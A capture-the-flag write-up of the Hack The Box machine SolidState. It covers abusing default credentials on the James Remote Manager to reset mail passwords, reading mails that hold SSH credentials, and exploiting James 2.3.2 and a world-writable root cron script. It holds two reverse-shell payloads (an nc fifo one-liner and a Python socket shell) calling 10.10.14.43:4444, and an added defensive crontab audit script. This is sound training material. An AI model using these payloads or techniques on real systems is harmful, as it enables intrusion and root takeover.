Hack The Box Writeup - SolidState

SolidState is a medium Linux box. The main objective of this box was to enumerate and exploit several things related to SMTP and POP3. In particular, an instance of the James SMTP server had to be exploited. First, we were able to access the Remote Manager by using the default credentials. There, we were able to change the passwords of all users. Next, we used these credentials to access the users’ mails via the POP3 service. The mails contained lots of confidential data, including a username and password for the SSH login. Unfortunately, the login dropped us into a restricted rbash shell. However, we were able to bypass the restricted shell by exploiting a very well known remote command execution vulnerability of the James SMTP server. To obtain the root flag, we simply exploited an existing cronjob that executed a file to which we had full read/write permissions. This way we could establish a reverse shell to the machine as user root. Overall, a great box for anyone who’s preparing for the OSCP exam.

Enumeration

As always, we start by scanning the target machine’s open ports:

rustscan --ulimit 5000 solidstate.htb -- -sV -sC -oN nmap_scan

PORT      STATE SERVICE       REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp5WdwlckuF4slNUO29xOk/Yl/cnXT/p6qwezI0ye+4iRSyor8lhyAEku/yz8KJXtA+ALhL7HwYbD3hDUxDkFw90V1Omdedbk7SxUVBPK2CiDpvXq1+r5fVw26WpTCdawGKkaOMYoSWvliBsbwMLJEUwVbZ/GZ1SUEswpYkyZeiSC1qk72L6CiZ9/5za4MTZw8Cq0akT7G+mX7Qgc+5eOEGcqZt3cBtWzKjHyOZJAEUtwXAHly29KtrPUddXEIF0qJUxKXArEDvsp7OkuQ0fktXXkZuyN/GRFeu3im7uQVuDgiXFKbEfmoQAsvLrR8YiKFUG6QBdI9awwmTkLFbS1Z
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBISyhm1hXZNQl3cslogs5LKqgWEozfjs3S3aPy4k3riFb6UYu6Q1QsxIEOGBSPAWEkevVz1msTrRRyvHPiUQ+eE=
|   256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKbFbK3MJqjMh9oEw/2OVe0isA7e3ruHz5fhUP4cVgY
25/tcp   open  smtp?   syn-ack
|_smtp-commands: Couldn't establish connection on port 25
80/tcp   open  http    syn-ack Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
110/tcp  open  pop3?   syn-ack
119/tcp  open  nntp?   syn-ack
4555/tcp open  rsip?   syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

According to the port scan the machine has several open ports. The most interesting ones are the following:

  • Port 22 - OpenSSH 7.4p1 Debian
  • Port 25 - SMTP
  • Port 80 - Apache httpd 2.4.25
  • Port 110 - pop3

Enumeration Port 25 - SMTP

For the enumeration of the SMTP server, we start with some simple things like grabbing the SMTP server’s banner. This can be done by simply connecting to the service via nc or telnet.

┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ nc -vn 10.129.29.189 25
(UNKNOWN) [10.129.29.189] 25 (smtp) open
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Fri, 24 Jun 2022 08:49:30 -0400 (EDT)

Here, we immediately get the server version. Apparently it’s JAMES SMTP Server 2.3.2. This also gives us information about the other ports, as JAMES also comes with POP3 (Port 110), NNTP (Port 119) and the James Remote Manager (Port 4555). However, what’s more interesting is that this particular version of the James SMTP server is well known for a Remote Command Execution.

James SMTP Server 2.3.2 - Remote Command Execution

“Apache James 2.3.2 is an email server containing a vulnerability that allows an attacker to execute arbitrary commands on the machine running the server. The vulnerability arises from an insecure default configuration and a lack of input validation in the server’s user creation mechanism; it allows an attacker to enqueue commands to execute when a user signs into the machine. Despite the vulnerability, a number of techniques can be employed to reduce the machine’s attack surface and mitigate the risk of a compromise.” Source

Searchsploit also provides us several working exploits for that vulnerability:

The problem is: the exploit requires another user to log in. So we first have to find some user credentials. Maybe there are some confidential mails that we can access through the mail server.

Finding credentials

A great utility is the Remote Manager on port 4555. A common issue with James is that the default credentials root:root are left unchanged. That is also the case here: they work, and we get access to the Remote Manager of the James SMTP server.

Here, we can now check for existing users:

listusers

Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Great! Now let’s change the password of each user so that we can successfully authenticate ourselves at the POP3 server.

setpassword james 1234
Password for james reset
setpassword thomas 1234
Password for thomas reset
setpassword john 1234
Password for john reset
setpassword mindy 1234
Password for mindy reset
setpassword mailadmin 1234
Password for mailadmin reset

The next step is to connect to the POP3 server (that’s the mail receiver) to list the mails of the found users (I had some issues with nc, so I switched to telnet):

┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER james
+OK
PASS 1234
+OK Welcome james
LIST
+OK 0 0

Hmm, no mails for the user james. Let’s move on to the user thomas. But he also has no mails in his mailbox…

┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER thomas
+OK
PASS 1234
+OK Welcome thomas
LIST
+OK 0 0
.
^]

Let’s proceed with john. Finally, we get some more information:

┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER john
+OK
PASS 1234
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

The mail talks about a temporary password for the user mindy. That’s exactly what we are looking for! Let’s inspect mindy's mailbox.

┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS 1234
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.

We see 2 mails in her mailbox.

Mail 1

Just some information about the onboarding … not something that’s particularly helpful for us.

RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.

Mail 2

That’s what we’ve been looking for! Credentials for the user mindy: mindy:P@55W0rd1!2@.

RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

Initial Foothold

Now that we have valid credentials for the user mindy, we can try to log in to the system via SSH.

And it works! There is just one major problem: this is not a proper shell but rbash. This means we are highly restricted in the available commands that we can execute. We cannot even change directory.

But remember the Remote Command Execution vulnerability of the JAMES SMTP server? We can now exploit that vulnerability, as we can simulate the user login ourselves! This way, we can establish a proper reverse shell (with full permissions) as user mindy. As this is a very well known exploit, I won’t go into much detail here. However, if you still want details on how the exploit works, this article explains it step by step.

Anyway. In this case, we simply use the 35513.py script and adjust the payload as follows:

payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.43 4444 >/tmp/f'

When executing the script, it will overwrite the /etc/bash_completion.d file. Once a user logs in (we do that manually as user mindy), it will execute the provided payload (in this case a reverse shell).

There we go, we just bypassed the rbash restriction!

Privilege Escalation

We can now start with the enumeration of the system. First, we upload a copy of linpeas.sh to the system. Then, we give it execute permissions and run the script.

The output gives us a decent overview of the system:

1) We see that root runs some cronjobs.

  root       510  0.0  0.5   5264  2864 ?        Ss   07:25   0:00 /usr/sbin/cron -f 

2) There is a file called /opt/tmp.py to which we have full permissions.

  -rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

That’s the code which is stored in the tmp.py file:

#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

That’s interesting! I’ve already been wondering why my linpeas.sh disappeared. My current guess is that this file is somehow involved in the cronjob that’s being executed by root. Let’s use pspy to verify that assumption.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855

Apparently my assumption was correct! Every 3 minutes we get the following output: root simply executes the tmp.py file.

2022/06/24 11:06:01 CMD: UID=0    PID=6512   | /usr/sbin/CRON -f 
2022/06/24 11:06:01 CMD: UID=0    PID=6513   | /usr/sbin/CRON -f 
2022/06/24 11:06:01 CMD: UID=0    PID=6514   | /bin/sh -c python /opt/tmp.py 
2022/06/24 11:06:01 CMD: UID=0    PID=6515   | python /opt/tmp.py 
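The root cause here is a root cron job whose target script is world-writable. As an added example (not part of the original writeup), the following Python audit flags exactly that class of misconfiguration in a system crontab: a job whose referenced file is writable by group/other, or runs as root but is owned by someone else. The crontab text and file modes are constructed samples; on a live host the dict would be filled from os.stat() for each referenced path.

```python
import re
import stat

# Constructed sample of /etc/crontab (not copied from the box); the first
# job mirrors what pspy showed: root running python /opt/tmp.py every 3 min.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/3 * * * * root python /opt/tmp.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 2 * * * root /usr/local/bin/backup.sh --quiet
"""

# Constructed stand-in for os.stat() results: path -> (st_mode, st_uid).
# On a live host build this dict with os.stat() for each referenced path.
SAMPLE_FILES = {
    "/opt/tmp.py": (0o100777, 0),                  # -rwxrwxrwx root root (as on the box)
    "/usr/local/bin/backup.sh": (0o100755, 1001),  # hypothetical: owned by a non-root user
}

# System crontab format: minute hour dom month dow user command
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
ABS_PATH = re.compile(r"(?<![\w.-])/[\w./-]+")


def audit_crontab(text, files):
    """Return (user, path, reason) for cron jobs whose referenced files
    could be modified by someone other than root."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comment or environment assignment such as SHELL=
        m = CRON_LINE.match(line)
        if not m:
            continue
        user, cmd = m.group("user"), m.group("cmd")
        for path in ABS_PATH.findall(cmd):
            if path not in files:
                continue  # unknown path (e.g. /etc/cron.hourly in this sample)
            mode, uid = files[path]
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((user, path, "writable by group/other"))
            elif user == "root" and uid != 0:
                findings.append((user, path, f"runs as root but owned by uid {uid}"))
    return findings


if __name__ == "__main__":
    for user, path, reason in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FILES):
        print(f"[!] {user}: {path} {reason}")
```

The same check belongs in a hardening baseline: any file executed from root's crontab should be owned by root and mode 755 or stricter, which would have closed this escalation path.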

To gain root access, we simply have to change the code of the Python file. Easy as that:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.43",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Now we just have to wait another 3 minutes until the cronjob executes the modified file and establishes a reverse shell to our attacker machine.

This post is licensed under CC BY 4.0 by the author.